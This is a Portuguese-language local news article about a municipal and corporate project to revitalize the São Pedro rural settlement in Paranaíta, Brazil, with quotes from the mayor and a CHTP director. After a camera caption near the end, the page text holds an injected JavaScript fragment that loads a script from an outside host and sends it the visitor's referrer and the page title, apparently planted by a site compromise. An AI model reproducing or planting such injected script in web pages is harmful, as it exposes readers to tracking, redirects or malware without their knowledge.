Capa / Cultura / Com recursos do BNDS, CHTP e prefeitura investirão 8 milhões para revitalização da São Pedro

Com recursos do BNDS, CHTP e prefeitura investirão 8 milhões para revitalização da São Pedro

KODAK Digital Still Camera

Da Redação

Foi lançado ontem na Comunidade Sombra da Manhã em Paranaíta o projeto de revitalização da Gleba São Pedro, que prevê investimentos na ordem de 8 milhões de reais para execução de obras de infraestrutura no sentido de favorecer o acesso ao assentamento e aumentar a capacidade de escoamento de produção, também o levantamento topográfico das propriedades rurais para proporcionar ao INCRA a emissão de títulos aos assentados e a construção de espaço adequado para realização de reuniões, cursos de capacitação e produção cultural.
Os organizadores esperam com o projeto de restauração da Gleba São Pedro, combater o êxodo rural, estimular o associativismo, o empreendedorismo, recuperar nascentes e matas ciliares, dentre muitas outras metas que foram detalhadas às mais de 400 pessoas que acompanharam atentamente as explicações que foram apresentadas. “Quero enfatizar a parceria importante da prefeitura de Paranaíta, o INCRA, o próprio BNDS, o Instituto Centro e Vida e a Empaer que está também junto conosco neste grande trabalho que temos pela frente”, disse o diretor de Meio Ambiente da CHTP Marcos Duarte, afirmando que o projeto está sendo planejado desde o ano de 2013.
Segundo Duarte, o projeto todo gira em torno de três pilares principais, de produção, de direitos ambientais e de direitos sociais. “Um grande resultado que a gente espera é tentar regularizar o máximo de propriedades aqui no Assentamento, fazendo com que a gente consiga melhorar a qualidade de vida do pessoal, e que cada assentado tenha a sua propriedade sustentável”, afirmou.
Radiante, o prefeito Tony Rufatto (PSDB) afirmou que o dia 10 de maio é para entrar para a história não apenas do Assentamento, mas de Paranaíta como um todo, já que o projeto de revitalização da Gleba São Pedro vai ao encontro dos anseios das mais de 700 famílias que moram no assentamento. Durante entrevista a imprensa, Rufatto fez questão de enaltecer a ação direta do diretor da CHTP Marcos Duarte, a quem apontou como “responsável direto pela conquista”, fazendo questão de agradecer em nome da população. “O grande ganho neste projeto é a revitalização do Assentamento São Pedro, todas as áreas degradadas e principalmente as nascentes vão ser reflorestadas, vai ter o apoio inclusive para criar cooperativa. Pra deixar um grande legado aqui para as associações, inclusive na produção de leite, nós temos um projeto de tanques de peixes não apenas no assentamento mas em todo o município e a cooperativa vai ter a oportunidade de criar o seu laboratório para produzir alevinos, fazer ração par aos peixes e também comercializar a produção”, explicou, finalizando com o agradecimento. “Um agradecimento eterno par a CHTP e jamais vamos nos esquecer disto e tenho certeza que o povo de Assentamento também”, finalizou.

KODAK Digital Still Cameras.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top